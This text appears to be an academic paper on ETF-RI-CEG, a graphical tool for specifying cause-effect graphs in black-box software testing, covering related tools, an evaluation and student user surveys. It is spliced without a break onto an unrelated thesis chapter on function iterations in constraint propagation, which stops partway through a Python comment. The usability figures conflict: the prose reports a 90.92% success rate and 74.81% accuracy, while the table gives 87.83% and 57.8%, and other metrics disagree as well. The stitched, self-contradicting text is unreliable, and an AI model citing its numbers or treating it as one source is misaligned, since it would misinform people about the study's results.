The wide usage of cause-effect graphs as a black-box testing technique accentuates the importance of the process of correctly defining cause-effect graph specifications, which is imperative in order to correctly derive black-box test cases for the desired system. In some of the aforementioned works, constraint usage is omitted, which results in more feasible test cases than what is truly defined by system requirements. For example, in [9] the MSK constraint is not used between effect nodes. However, the effects are simultaneously exclusive and the existence of this constraint is necessary for removing infeasible test cases. In [22], the test case table contains test cases which do not conform to the presented cause-effect graph specification (e.g. when C6 is active, E2 is not set to active although these two nodes are connected by using the DIR logical relation). This indicates that cause-effect graph elements are used incorrectly or their usage is omitted in multiple available works, which results in incorrect feasible test case table specifications.
Different works use different types of graphical notation for describing cause-effect graphs, sometimes introducing elements which are hard to understand as they do not conform to any introduced standard. Due to these inconsistencies, it is important to analyze the standard accepted CEG graphical notation and its variations. In cases where multiple different proposed notations exist and are widely used, such as in case of entity relationship diagrams (ERDs), methods for conversion between different notations and detailed descriptions of differences between accepted standards are necessary [27]. However, in cause-effect graphs there is only one general standard and notations which do not conform to this standard are present only in a small number of available works. The initial graphical notation for representing cause-effect graph elements was introduced in [1]. This notation is very simple and includes the usage of different types of letters for representing logical relations and constraints (e.g. A for conjunction and O for disjunction). Full lines are used for connecting nodes by logical relations and dashed lines are used for connecting nodes by constraints.
Although the usage of full and dashed lines was adopted by all later works, many changes were made in the graphical notation for representing logical relations. Most works [2] [3] [4] [7] use graphical elements instead of letters to represent logical relations (e.g. wavy line for negation, arch and the symbol “\( \Delta \)” for disjunction) and this type of notation is considered as the general standard. However, some approaches use graphical notation which significantly differs from the standardized notation. For example, in [21] arrow tips are used for connecting nodes by logical relations, although arrow tips are standardly used only for representing the direction of the REQ and MSK constraints. In [15], logical relations are represented through the usage of bounding boxes and different symbols (e.g. AND instead of A for conjunction). A novel graphical notation with many differences to the general standard was proposed in [16]. This notation is more suited for the requirement elicitation process and introduces many new types of cause-effect graph elements such as membership and interactions. However, CEG representations created by the usage of this novel approach cannot be directly used for deriving test case tables and an algorithm for performing this conversion has yet to be introduced.
The development of software tools for aiding the process of cause-effect graph specification began with the introduction of TELDAP (Test Library Design Automation Program) in the initial work that introduced cause-effect graphs as a black-box testing technique [1]. TELDAP was an APL/360 program capable of processing cause-effect graph specifications and converting them to test case tables. TELDAP is outdated and no longer supported, so it is omitted from this study. BenderRBT [17] is a commercial software tool for creating cause-effect graph specifications through a graphical user interface. This tool is not free for usage and does not use standard graphical notation. In fact, the graphical notation used in this tool does not conform to any of the previously mentioned works (e.g. no works use the symbol “\( \Delta \)” for describing the DIR relation, the definition of the MSK constraint does not conform to the definition present in the standard literature, etc.).
Problems arising due to a low number of available software tools for creating CEG specifications were reported as far back as 1997 in [28]. Since then, several new CEG software tools...
have been introduced. Cause-effect graph software testing tool (CEGSTT) [18] is another tool for creating cause-effect graph specifications. It is not open-source nor available for free usage. This tool does not contain graphical elements, nor does it generate the graphical description of a cause-effect graph. Test generator for cause-effect graphs (TOUCH) [7] is a recently proposed software tool and it also does not contain graphical elements for cause-effect graph specifications. However, this tool is open-source [29] and cross-platform unlike BenderRBT and CEGSTT, which only run on the Microsoft Windows operating system. TOUCH supports test case table derivation by using many proposed algorithms based on Boolean expressions, whereas BenderRBT and CEGSTT use only the common Myers’ backward-propagation algorithm for this purpose. Korean requirement analyzer for cause-effect graphs (KRA-CE) [30] is another recently proposed software tool which automatically converts system requirement descriptions to cause-effect graph specifications and test case tables. However, this approach is localized to the Korean language and does not contain graphical elements of cause-effect graph specifications. The tool is cross-platform but it is currently not open-source.
III. THE PROPOSED GRAPHICAL SOFTWARE TOOL
The proposed graphical software tool is named ETF-RI-CEG. The tool is a desktop application developed by using the .NET 5 framework and the C# programming language with the Windows Forms application template. The .NET 5 version of the framework is cross-platform and supported on Microsoft Windows, Mac OS and Linux operating systems. However, in order to run the tool on Mac OS or Linux, Wine needs to be installed, as the execution of Windows Forms applications is not yet supported on these systems. Only the installation of the .NET 5 Runtime is required to run the tool on Microsoft Windows. The software tool is open-source and available for free usage. It can be accessed online on GitHub. The user manual of the tool contains instructions on how to build and use the application.
When the proposed tool is first opened, it contains an empty panel and options to add graph nodes, logical relations and constraints. Multiple operations can be performed with graph nodes in the proposed tool. New nodes can be added to the graph, and existing nodes can be moved on the graph or deleted from it entirely. Adding and moving nodes is done by using the drag-and-drop operation on the panel, whereas node removal is performed by using the list of existing nodes and the Delete button. New nodes are always assigned the lowest unclaimed number for their type (e.g. if nodes C1 and C2 are defined in the graph, the new node will be denoted as C3). After deleting a node from the graph, all logical relations and constraints that contain this node are also deleted.
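The "lowest unclaimed number" rule can be sketched as follows; this is a hypothetical helper, not the tool's actual implementation:

```python
# Sketch of the numbering rule: a new node receives the smallest positive
# number not yet used by existing nodes of its type.
def next_number(existing_labels, kind):
    """existing_labels: e.g. {"C1", "C2", "E1"}; kind: "C", "I" or "E"."""
    used = {int(label[1:]) for label in existing_labels
            if label.startswith(kind)}
    n = 1
    while n in used:
        n += 1
    return n

print(next_number({"C1", "C2", "E1"}, "C"))  # 3, as in the example above
print(next_number({"C1", "C3"}, "C"))        # 2 (the gap is the lowest unclaimed)
```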
Multiple operations can be performed with logical relations and constraints of the graph. New relations and constraints can be added to the graph or deleted from the graph entirely. All operations on logical relations and constraints are done in the same way. The graphical representation of logical relations and constraints after they are added to the graph in the graphical tool is shown in Fig. 1 (all types of logical relations) and Fig. 2 (all types of constraints). This representation uses the standardized graphical notation from [4] and [7].
Adding and removing logical relations and constraints is done in the same way for all different types in the graphical software tool. Adding a new logical relation or constraint is more complex than adding nodes, because all nodes which are part of the desired logical relation or constraint need to be selected. To make the selection process easier for the user, every selected node is marked with a black box. Removing existing logical relations and constraints in the proposed tool
---
1 ETF-RI-CEG can be accessed by using the following link: https://github.com/ehlymana/ETF-RI-CEG-Graphical
works in the same way as removing an existing node, by selecting the desired logical relation or constraint from the corresponding list and clicking on the Delete button.
After defining the desired cause-effect graph, it can be saved for later usage by using the Import/Export option. The exported .txt file contains the structure of the graph (graph nodes, their locations, logical relations and constraints) created in the graphical software tool, as shown in Fig. 3. The contents of the file are easily readable and can be used for importing the graph for later usage in the proposed tool. When importing an existing graph file, the user is prompted to choose the desired exported file that contains the graph definition, after which the graph is shown on the panel of the tool, where it can be modified.
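The exact layout of the exported .txt file is shown in Fig. 3 and documented in the tool's user manual; the sketch below only illustrates how such a file could serialize nodes, positions, relations and constraints. The line format used here is an assumption for illustration, not the tool's actual format:

```python
# Hypothetical serialization of a cause-effect graph to a readable text
# format (the real ETF-RI-CEG format may differ).
def export_graph(nodes, relations, constraints):
    """nodes: {label: (x, y)}; relations/constraints: list of (type, [labels])."""
    lines = ["# nodes"]
    lines += [f"{label} {x} {y}" for label, (x, y) in nodes.items()]
    lines.append("# relations")
    lines += [f"{op} {' '.join(members)}" for op, members in relations]
    lines.append("# constraints")
    lines += [f"{op} {' '.join(members)}" for op, members in constraints]
    return "\n".join(lines)

text = export_graph({"C1": (10, 20), "E1": (200, 20)},
                    [("DIR", ["C1", "E1"])], [])
print(text)
```

Parsing such a file back (the import direction) would simply reverse this mapping, which keeps the exported graphs both human-readable and machine-restorable.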
IV. EVALUATION
Evaluation of the proposed graphical tool was done by using three different approaches. First, multiple cause-effect graphs of different sizes from the standard literature were used for checking whether ETF-RI-CEG is scalable to graph size during the CEG specification process. The newly proposed tool was also compared to the only other currently available software tool which contains graphical elements, BenderRBT. Example graphs and a user survey were used for this purpose. User-based evaluation was also used for determining the overall usability of ETF-RI-CEG and multiple usability metrics were calculated based on the gathered information from multiple users.
A. Evaluation of Software Tool Scalability
In order to validate that the newly introduced graphical software tool can be applied for successfully creating CEG definitions, the following examples from the relevant literature were used:
1) A small cause-effect graph (\( n = 6 \) cause and effect nodes) from [4] which is shown in Fig. 4. This representation uses the standard accepted graphical notation and contains causes, effects, intermediates and different types of logical relations, as well as a single constraint. Fig. 5 shows the definition of the same cause-effect graph in the proposed tool. It is visible that the two graphs are nearly identical due to the fact that the same notation is used for representing the graph. The only difference can be seen in the naming convention for nodes – the original representation uses numbers associated with the system requirements, whereas the proposed tool explicitly defines the type and number for every node shown on the graph.
Fig. 4. Example cause-effect graph from [4] which contains three cause nodes, three effect nodes, one intermediate node, four logical relations and one constraint.
Fig. 5. The output of the proposed graphical software tool for the cause-effect graph defined in Fig. 4.
2) A medium cause-effect graph (n = 10 cause and effect nodes) from the original work that introduced the cause-effect graphing technique [1] which is shown in Fig. 6. This graph uses graphical notation proposed in the original work (A represents the AND relation, O represents the OR relation, etc.). Fig. 7 shows the definition of the same cause-effect graph in the proposed graphical software tool, where the standardized graphical notation is used to represent logical relations and one intermediate node is visible on the graph. There are many differences to the original representation including separate numbering for different types of nodes and the usage of improved graphical notation for representing logical relations. The most important difference to the original representation is the replacement of the EXC constraint originally defined on nodes $C_1$ and $I_1$. Using intermediates in constraints is not directly allowed in the proposed tool (because constraints can only be defined on cause nodes). This relation was replaced by putting an EXC constraint on both of the cause nodes that result in the activation of the intermediate node $I_1$ to capture the desired relation.
3) A large cause-effect graph (n = 25 cause and effect nodes) from [4] which is commonly used for comparison due to its large size, which is shown in Fig. 8. Fig. 9 shows the definition of the same cause-effect graph in the proposed tool. Some of the differences to the original representation have already been mentioned in previous examples, including changes regarding node numbering. New intermediate nodes were added to the graph in order to capture the NOT logical relation prior to the usage of the desired nodes in binary logical relations, because unary and binary logical relations cannot be combined. The main difference to the original representation is the replacement of the negated REQ constraint originally defined on nodes $C_1$ and $C_2$. The usage of this constraint is not directly allowed in the proposed tool (because constraint values cannot be negated). This relation was replaced by using the EXC Δ INC constraint (which renders two out of four combinations $C_1$-$C_2$: 0-0 and 1-1 infeasible) combined with the REQ constraint (which renders the third combination $C_1$-$C_2$: 0-1 infeasible, leaving only the desired combination $C_1$-$C_2$: 1-0 feasible).
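The replacement described in item 3 can be verified by enumerating all four \( C_1 \)-\( C_2 \) combinations. In this sketch, REQ is applied in the direction "C2 requires C1", matching the text (it renders 0-1 infeasible); the function names are illustrative:

```python
# Verifying that EXC Δ INC combined with REQ leaves only C1-C2: 1-0 feasible,
# emulating the negated REQ constraint from the original representation.
def exc_inc(c1, c2):
    # EXC Δ INC: exactly one of the two causes active (0-0 and 1-1 infeasible)
    return c1 != c2

def req(c1, c2):
    # REQ as applied here: C2 requires C1, so C1=0, C2=1 is infeasible
    return not (c2 == 1 and c1 == 0)

feasible_combinations = [(c1, c2) for c1 in (0, 1) for c2 in (0, 1)
                         if exc_inc(c1, c2) and req(c1, c2)]
print(feasible_combinations)  # [(1, 0)] -- only the desired combination remains
```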
and the proposed tool. In BenderRBT, nodes are not numbered but instead contain descriptions related to system requirements. Standardized graphical notation is not used to represent logical relations or constraints.
Some necessary changes have already been mentioned, such as combining the usage of unary and binary relations through intermediate nodes. The main difference from the original representation is the replacement of the MSK constraint originally defined on causes (which is forbidden, because the MSK constraint can be applied only to effects). It was additionally unclear what the meaning of the negated MSK constraint present in Fig. 10 was. As explained by [31], negation on the MSK relation is used in BenderRBT to represent the subject of the MSK relation, whereas the other links are used to represent the objects of the MSK relation. This does not conform to the standard definition of the MSK relation explained in Section II. Instead, it represents the REQ relation between the subject and the objects of the MSK relation. Therefore, the identified REQ relations were added to the graph as a replacement for the incorrectly applied MSK relation.
The presented example and the results achieved by comparing the output of BenderRBT with the output of ETF-RI-CEG cannot be generalized, because this example might not be representative of all BenderRBT outputs. In order to improve the objectivity of the results, a user survey was conducted. The survey contained multiple examples which can
---
2 The user survey can be accessed by using the following link: https://forms.gle/ypcHEP5YHkWC28FD6
be found in the BenderRBT user manual [31] and their representations created in ETF-RI-CEG. The survey focused on comparing the different representations and getting information from the users on which representation is easier to understand, how complex they perceive the cause-effect graphs, whether they can correctly identify results of logical relations and constraints, etc. The survey was completed by 59 BSc and MSc students of the Faculty of Electrical Engineering, University of Sarajevo. Their background knowledge of software testing and cause-effect graphs is summarized in Table IV. Most participants had little to no experience with software testing and more than a third of participants had not heard of cause-effect graphs before.
Participants were shown three different cause-effect graph specifications of varying complexities from BenderRBT and their equivalent representations from ETF-RI-CEG. They were also asked to choose the tool with a more intuitive UI. The achieved results are shown in Fig. 12. The results show that in all cases, a larger number of users chose cause-effect graphs generated by the proposed tool as their preferred choice. It is also visible that more users found the user interface of the proposed tool more intuitive than the user interface of BenderRBT.
The users’ knowledge of constraints and ability to correctly identify cause-effect graph elements was also targeted by the survey. They were asked which types of nodes the REQ and MSK constraints can be applied to, after which they were shown two CEG specifications – one containing the MSK constraint created by BenderRBT, and one containing the REQ constraint created by ETF-RI-CEG. The results are shown in Table V. A very low number of users correctly understood the REQ and MSK relations (28.8% and 27.1%, respectively), whereas an even lower number of users correctly identified test cases conforming to CEG specifications from BenderRBT and ETF-RI-CEG (20.3% and 16.9%, respectively). Additionally, only 20.3% of users were able to correctly identify that the two CEG representations generated by BenderRBT and ETF-RI-CEG from Fig. 10 and Fig. 11 were equivalent.
The users were also shown a cause-effect graph of high complexity and its representations in BenderRBT and ETF-RI-CEG. They were asked to identify the number of all types of nodes contained in the graph and to rate the complexity of the graph representations from 1 to 10. The cause-effect graph representations generated by BenderRBT and ETF-RI-CEG achieved average complexity ratings of 7.41 and 5.62, respectively. The exact number of nodes (causes, intermediates and effects) in the representations generated by BenderRBT and ETF-RI-CEG was correctly identified by 25% and 59.38% of users, respectively. 57.6% of users answered that CEG nodes with textual descriptions made it easier to understand system requirements, whereas 49.2% of users answered that CEG nodes without textual descriptions made it harder to understand system requirements.
Other available tools (CEGSTT, TOUCH and KRA-CE) do not contain graphical elements of cause-effect graphs, as their primary purpose is the application of algorithms which are meant to convert cause-effect graph specifications to test case tables. Nodes and relations in these tools are instead defined by using the provided user interface or textual files. For this reason, the newly proposed tool could not be compared to these tools, as there is no graphical output for comparison.
C. Evaluation of Usability
User-based evaluation of the newly proposed tool was conducted by creating a remote usability survey\(^3\) [32]. The survey contained directions on how to install ETF-RI-CEG and 12 tasks which the users needed to complete by using all functionalities of the proposed tool. The questions contained in the survey were based on the following user experience factors [33]: ease of use, efficiency, helpfulness, intuitive operation, learnability and simplicity. The survey was completed by 45 BSc and MSc students of the Faculty of Electrical Engineering,
\(^3\) The user survey can be accessed by using the following link: https://forms.gle/wbjFbfdf4LVkVrie7
University of Sarajevo. The achieved usability metric values as defined in [32] are summarized in Table VI. The participants were able to successfully complete 10.91 tasks out of 12 on average with an overall average success rate of 90.92%, overall average task accuracy of 74.81%, overall average efficiency of 0.285, overall average error rate of 3.96 and overall average critical statement ratio of 11.14.
TABLE VI. ACHIEVED USABILITY METRIC VALUES FOR ETF-RI-CEG
<table>
<thead>
<tr>
<th>Metric</th>
<th>ETF-RI-CEG functionalities</th>
</tr>
</thead>
<tbody>
<tr><td>Success rate (0–33% of tasks completed)</td><td>2.2%</td></tr>
<tr><td>Success rate (33–66% of tasks completed)</td><td>11.1%</td></tr>
<tr><td>Success rate (66%+ of tasks completed)</td><td>86.7%</td></tr>
<tr><td>Average success rate</td><td>87.83%</td></tr>
<tr><td>Task accuracy</td><td>57.8%</td></tr>
<tr><td>Error rate</td><td>1.37</td></tr>
<tr><td>Efficiency</td><td>0.142</td></tr>
<tr><td>Average task duration</td><td>4.07 minutes</td></tr>
<tr><td>Critical statement ratio</td><td>6.5</td></tr>
</tbody>
</table>
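As a hedged illustration of how an aggregate such as the average success rate could be computed from per-participant task results (the exact metric definitions come from [32] and may differ):

```python
# Illustrative computation of an average success rate across participants.
# The input data below is hypothetical, not the survey's raw data.
def average_success_rate(results):
    """results: list of (completed_tasks, total_tasks) per participant."""
    rates = [done / total for done, total in results]
    return 100 * sum(rates) / len(rates)

# Three hypothetical participants, each given 12 tasks:
print(round(average_success_rate([(12, 12), (10, 12), (11, 12)]), 2))  # 91.67
```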
Different types of mistakes which the users of ETF-RI-CEG reported are shown in Fig. 13. 43.8% of users did not report making any mistakes, whereas 50% of users who reported mistakes listed working with logical relations as the most difficult. Mistakes while using some functionalities such as element removal or the export/import feature were not reported by any users of the tool.
Users were asked to grade the proposed tool based on three user experience factors: ease of use, intuitiveness and helpfulness. The achieved results are shown in Fig. 14, where it can be seen that the proposed tool achieved results higher than 90% for all three factors of usability. Users were also asked to choose which functionalities they found easy and hard to use. The easiest functionalities identified by users were moving nodes (86.7%), adding nodes (84.4%) and the import feature (84.4%), whereas the hardest functionalities identified by users were adding complex logical relations (44.4%) and adding constraints (71.1%).
D. Result Analysis
The results achieved in Section IV.A, comparing the notation used in the standardized literature with the output of the proposed tool, indicate that standardized graphical notation and the defined outputs of logical relations and constraints are often violated by adding elements which are not defined in the available literature. This results in confusing CEG definitions with unclear relation outputs. Examples of these violations can be seen in Fig. 6, where a constraint is used on an intermediate node (although constraints cannot be defined on intermediate nodes); in Fig. 8, where unary relations (NOT) are combined with binary relations (AND) without the usage of intermediate nodes and where a negated REQ constraint is used (although the REQ constraint cannot be negated); and in Fig. 10, where a negated MSK constraint is used (although the MSK constraint cannot be negated) and where the MSK constraint is applied to cause nodes (instead of effect nodes) in a misleading and confusing way, since the relation actually intended between the causes was the REQ relation.
The newly proposed tool solves the aforementioned problems by not allowing the user to specify anything that is not supported by the standardized literature. This makes it impossible to use an intermediate node in a constraint or to negate a constraint while creating a cause-effect graph specification. These violations are unnecessary and can be remodeled by using supported relation types, as demonstrated in all example graphs used for the evaluation of the proposed tool. The user survey showed that most users do not understand the meaning and usage of the REQ and MSK constraints, which makes the use of standardized notation with explicitly defined truth tables even more important. The result is standardized, easily understandable cause-effect graphs that conform to the standardized graphical notation and do not contain elements that are difficult to understand due to inconsistencies with the truth tables for logical relations and constraints.
Results of the user survey of ETF-RI-CEG when compared to the only other available software tool with the usage of graphical elements, BenderRBT, indicate that CEG...
specifications generated by the proposed tool are easier to understand. The textual descriptions present in BenderRBT representations did not make it significantly easier to understand system requirements, and equivalent representations from BenderRBT were rated as more complex than representations from ETF-RI-CEG. Usability metrics of the proposed tool indicate that most users were able to use the tool successfully and that difficulties occurred mainly when adding complex logical relations and constraints. It is important to note, however, that most users had little to no experience with cause-effect graphs and software testing in general. They were not taught how to use the tool or offered a user manual, yet they still achieved an average success rate of 90.92%. Over 90% of users rated ETF-RI-CEG as easy to use, intuitive and helpful, which indicates that the proposed tool can achieve similar results in the future, especially since it is open-source and free for usage.
V. Threats to Validity and Limitations
The evaluation of the newly proposed graphical software tool was conducted by using a large number of available cause-effect graph examples from the standard literature. A total of 16 graphs were created successfully with an average size of N = 9.4 nodes. The import/export feature of the tool enables other users to achieve the same results and access the successfully created cause-effect graph specifications. Additionally, ETF-RI-CEG is open-source and the exported generated cause-effect graph specifications are available for free usage. Therefore, the internal validity of this study has been achieved successfully, because the experiment can be repeated and the same results can be achieved without any external variables influencing the outcome.
The surveys conducted for evaluating the usability of the newly proposed tool and for comparing this tool with BenderRBT features expose threats to the external validity of the study. Both surveys were conducted in the form of a remote usability survey, which might yield significantly biased results. The participants of the surveys were mainly BSc and MSc students of Computer Science and Informatics, who had little to no experience in software testing. The two surveys had 45 and 59 participants, respectively, which might not be a large enough sample for producing accurate results. Around 60% of participants were familiar with cause-effect graphs, although biased selection of survey subjects was avoided in a similar way as described in [12]. No training was provided to users before taking the survey, which might have affected the achieved results and increased the overall time required for completing tasks in the proposed graphical software tool.
The structure of participants poses another threat to the external validity of the study. No domain or industrial experts were included in the study due to their unavailability, which might pose a problem in cases where open-source and industrial development differ significantly, as reported in [34]. If BenderRBT were commonly used among domain experts in the software development industry, the usability of this tool would far outperform the usability of the newly proposed tool, as the users would be more familiar with its interface. These claims can neither be proven nor discarded due to the unavailability of this type of data. However, both surveys used multiple consolidated factors from [33] for generating more objective results. A similar problem with the structure of participants and limited generalizability of the achieved results was reported in [35]; however, the structure of study subjects had a low impact on the achieved results due to the nature of the study itself and its human-centered concepts. A similar conclusion can also be derived for this study: although the subjects had some prior experience in software testing, they had used neither ETF-RI-CEG nor BenderRBT before. This may lead to more objective results than if the tools were evaluated by domain experts with prior BenderRBT experience, as familiarity with any of the evaluated tools can affect the objectivity of the results and lead to different usability metric values.
The main limitation of this study is the unavailability of existing CEG software tools. Only one tool (TOUCH) is open-source and can be freely accessed, whereas no other existing tool could be successfully acquired by the authors of this paper. Due to this drawback, the properties of other existing tools could not be evaluated or validated (e.g. being cross-platform, the file format supported by the import/export feature), which is why the information from user manuals provided by the authors of the tools was used as the only relevant source. If BenderRBT had been available, a third survey requiring users to perform the entirely same tasks as in the study focusing on ETF-RI-CEG could have been conducted. These results could have then been compared and a more objective comparison between the usability of these two tools could have been made.
VI. Conclusion
Cause-effect graphing is a popular black-box testing technique widely used for creating test case tables necessary for executing black-box tests on the desired system. Problems with creating test cases for a given system often arise due to an insufficient amount of knowledge of cause-effect graph elements. This leads to the improper usage of logical relations and constraints while creating cause-effect graph specifications from system requirements. The standardized graphical notation is also often violated, resulting in specifications which are difficult to understand, as they do not conform to truth table definitions and introduce elements without a sufficient amount of explanation or methods for their conversion to the standardized notation. A small number of software tools have been proposed for aiding the process of creating CEG specifications; however, the available tools are mainly focused on the application of algorithms for deriving test cases instead of defining graphical cause-effect graph elements, and most tools are not available for free usage. The only available graphical tool is commercial and does not use standardized graphical notation.
In this paper, a new graphical software tool for creating cause-effect graph definitions was presented. The tool aims to overcome the existing difficulties of creating cause-effect graph specifications which arise due to a poor understanding of logical relations and constraints. It also aims to provide a new and intuitive user interface that can help users create cause-effect graph definitions in a fast and efficient way while using standardized graphical notation, without allowing the usage of any non-standardized elements in cause-effect graphs.
Several approaches have been used to evaluate the newly proposed software tool. The comparison between the graphical representation of the graphs created by using the proposed graphical software tool and the originally proposed representations shows that the new tool is scalable and can be used to successfully create specifications of cause-effect graphs of different sizes. The only differences in the graphical representations were a result of the improper usage of standardized graphical notation in the original works.
The results obtained by using the proposed tool when compared to the only other available graphical software tool show that the usage of standardized graphical notation creates specifications that are easier to understand than results obtained by using non-standardized graphical notation. This was verified by conducting a user survey, which showed that usage of textual descriptions of system requirements did not significantly improve the readability of cause-effect graph specifications. Users rated CEG specifications generated by using the proposed tool as less complex than the equivalent specifications generated by using the other available graphical tool. Another user survey, conducted to evaluate the usability of the proposed software tool, showed that most users found the proposed tool helpful, easy and intuitive to use. High values of usability metrics indicate that the newly proposed software tool offers an intuitive and easily understandable output for users, who can use truth tables as help when choosing the desired logical relations and constraints for cause-effect graph specifications. In this way, standardized graphical notation and explicit definitions can be used rather than non-standardized approaches.
The proposed graphical software tool was developed in the form of a desktop application. However, most tools are nowadays cloud-based and allow online collaboration between multiple users and an easily accessible user interface. Creating a web-based version of the proposed tool would remove the necessity of installation of prerequisites and the application itself, making the software tool available to more users and on multiple devices. Due to this, a web-application version of the software tool should be created by using the latest technologies, in order to make the tool fully cross-platform and widely used.
The output of the graphical software tool is the visual representation of the defined cause-effect graph, as well as an exported .txt file. This exported representation can potentially be used for reusing the graph definition in order to create black-box test case tables. This needs to be further explored for upgrading the graphical software tool with a new feature – automatically converting the graph definition into the desired test case table. The usability of the proposed graphical software tool would in this way be further improved and made comparable with other available tools, which already contain implementations of algorithms for test case table generating process from cause-effect graph specifications.
REFERENCES
Ehliman Krupalija received her B.Sc. and M.Sc. degrees in 2018 and 2020 at the Department of Computer Science and Informatics at the Faculty of Electrical Engineering of the University of Sarajevo. She is currently a teaching assistant and Ph.D. candidate at the Department of Computer Science and Informatics of the Faculty of Electrical Engineering, University of Sarajevo, Bosnia and Herzegovina. Her research interests include software quality, real-time systems, parallelization and optimization techniques.
Šeila Bečirović received her B.Sc. and M.Sc. degrees in 2017 and 2019 at the Department of Computer Science and Informatics at the Faculty of Electrical Engineering of the University of Sarajevo. She is currently a teaching assistant and Ph.D. candidate at the Department of Computer Science and Informatics of the Faculty of Electrical Engineering, University of Sarajevo, Bosnia and Herzegovina. Her research interests include computer networks and security, mobile application development and operational research.
Irfan Prazina received his B.Sc. and M.Sc. degrees in 2013 and 2015 at the Department of Computer Science and Informatics at the Faculty of Electrical Engineering of the University of Sarajevo. He is currently a senior teaching assistant and Ph.D. candidate at the Department of Computer Science and Informatics of the Faculty of Electrical Engineering, University of Sarajevo, Bosnia and Herzegovina. His research interests include web technologies, software testing and mobile application development.
Emir Cogo received his B.Sc. and M.Sc. degrees in 2011 and 2013 at the Department of Computer Science and Informatics at the Faculty of Electrical Engineering of the University of Sarajevo. He is currently a senior teaching assistant and Ph.D. candidate at the Department of Computer Science and Informatics of the Faculty of Electrical Engineering, University of Sarajevo, Bosnia and Herzegovina. His research interests include game development, computer graphics and procedural modeling.
Ingmar Bešić graduated with distinction in 2000 at the Department of Computer Science and Informatics of the Faculty of Electrical Engineering of the University of Sarajevo. He received his M.Sc. degree in Software Engineering in 2004 from the Koble College at the University of Oxford. In 2016 he received his Ph.D. degree at the Faculty of Electrical Engineering of the University of Sarajevo. His research interests include computer vision, real-time systems, software engineering, artificial intelligence, bioinformatics, computer assisted design and manufacturing and 3D scanning. He is currently an associate professor at the Department of Computer Science and Informatics of the Faculty of Electrical Engineering, University of Sarajevo, Bosnia and Herzegovina.
Chapter 3
A Schema of Function Iterations
3.1 Introduction
3.1.1 Motivations
In the remainder of the first part of our thesis, we shall gradually zoom in on constraint propagation. Under this name fall a number of mainly polynomial-time algorithms; each of these iteratively removes certain inconsistencies from CSPs, thereby attempting to limit the combinatorial explosion of the solution search space. More interestingly, all these algorithms avoid backtracking: at each iteration, a constraint propagation algorithm may remove values from CSPs, but it never adds them back in subsequent iterations.
Constraint propagation algorithms are known in the literature under various other names: filtering, narrowing, local consistency (which is, for some authors, a more specific notion), constraint enforcing, constraint inference, Waltz algorithms, incomplete constraint solvers, reasoners. However, here and in the remainder of this thesis, we adopt the most popular name and always refer to them as constraint propagation algorithms.
In [Apt00a], the author states that "the attempts of finding general principles behind the constraint propagation algorithms repeatedly reoccur in the literature on constraint satisfaction problems spanning the last twenty years".
On a larger scale, the search for general principles is a common drive, shared by theoretical scientists of diverse disciplines: a series of methods to solve certain problems is devised; in turn, at a certain stage, this process calls for a uniform and general view, if a common pattern can be envisaged. For instance, think of polynomial equations. Until the fifteenth century, algebra was a mere collection of stratagems for solving only numerical equations; these were expressed in words, and the account of the various solving methods was, sometimes, pure literature*. It was Viète who, in his *Opera Arithmetica* (1646), introduced the use of vowels for unknown values; this simplified notation paved the way to a general theory of polynomial equations and solving methods, no longer restricted to numerical equations.

---

* Cf. "La 'grande arte': l'algebra nel Rinascimento". U. Bottazzini, in Storia della scienza
In this chapter, we propose a simple theory for describing constraint propagation algorithms by means of function iterations; the aim is to give a more general view on constraint propagation, based on functions and their iterations. It is well known that partial functions can be used for the semantics of deterministic programs; for instance, see [Jon97, LP81, Pap94]. The primary objective of our theorisation thus becomes that of tackling the following issues:
- abstracting which functions perform the task of pruning or propagation of inconsistencies in constraint propagation algorithms,
- describing and analysing how the pruning and propagation process is carried through by constraint propagation algorithms.
In this chapter, we mainly focus on the latter item, that is, on how functions remove certain inconsistencies from CSPs and propagate the effects of this pruning. The basic theory, proposed in this chapter, will provide a uniform reading of a number of constraint propagation algorithms. Then, in Chapter 6, only after describing and analysing those algorithms in Chapters 4 and 5 via that theory, do we specify which functions are traced in their study.
### 3.1.2 Outline
The topic of this chapter is a basic theory of iterations of functions for constraint propagation algorithms.
We first characterise iterations of functions (see Section 3.2) and then introduce the basic algorithm schema that iterates them by following a certain strategy (see Section 3.3). Thus, in the remainder of this chapter, we investigate some properties of the proposed algorithm schema by studying those of the iterated functions and the iterations themselves, see Section 3.4. For example, idempotency of functions will be related to fruitless loops, in terms of pruning, that can be thereby cut off. In turn, this property of functions will be traced in some specific constraint propagation algorithms in which it is used to avoid redundant computations, see Chapter 4.
On the one hand, the proposed algorithm schema is sufficient for describing many constraint propagation algorithms in terms of functions on a generic set, see Subsection 3.3.1, or on an equivalent set, see Subsection 3.4.3. On the other hand, a partial order on the function domain provides, loosely speaking, a sharper tool for analysing and studying the behaviour of these algorithms. More precisely, a partial order on the function domain gives us a means to partially order the possible computations of algorithms, see Subsection 3.3.2. Thereby, by means of the domain order, we can pose and answer the following sort of questions about the behaviour of constraint propagation algorithms.
- Can the order of constraint propagation affect the result? Or is the output problem independent of the specific order in which constraint propagation is performed (see Theorem 3.3.8)?
- Do constraint propagation algorithms always terminate? Or what is sufficient to guarantee their termination (see Theorem 3.3.9 and Corollary 3.3.10)?
In all the analysed cases in Chapter 4, functions for constraint propagation algorithms turn out to be inflationary with respect to a suitable partial order on their domain, see p. 32. This property of functions also accounts for the absence of backtracking in constraint propagation algorithms: pruning of values is never resumed, since every execution of a constraint propagation algorithm always proceeds along an order.

Other properties of functions, related to the order, can be further used to prune branches from the algorithm search tree; we shall study this issue in Subsection 3.4.2. For instance, a property that we call stationarity will be introduced as a stronger form of idempotency; hence functions that enjoy it need to occur at most once in any execution of the algorithm schema.
### 3.1.3 Structure

First, we introduce iterations of functions in Section 3.2, and the basic schema to iterate them in Section 3.3. Variations of the basic schema, along with the related properties of functions, are treated in detail in Section 3.4. Finally, we summarise and discuss the results of this chapter in Section 3.5.
### 3.2 Iterations of Functions

Given a finite set $F$ of functions $f : O \mapsto O$ over a set $O$, we define a sequence $(o_n : n \in \mathbb{N})$ with values in $O$ as follows:

1. $o_0 := \bot$, where $\bot$ is a selected element of $O$;
2. $o_{n+1} := f(o_n)$, for some $f \in F$.

Each sequence $(o_n : n \in \mathbb{N})$ is called an iteration of $F$ functions (based on $\bot$). An iteration of $F$ functions $(o_n : n \in \mathbb{N})$ stabilises at $o_n$ if $o_{n+k} = o_n$ for every $k \geq 0$.
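For concreteness, the definitions above can be sketched in Python. This is our own illustration, not part of the text: the helper names `iterate` and `stabilises_at` are ours, and a finite prefix stands in for the infinite sequence.

```python
# Sketch of an iteration of F functions (Section 3.2): o_0 := bottom and
# o_{n+1} := f(o_n) for the n-th chosen function f. A finite list of
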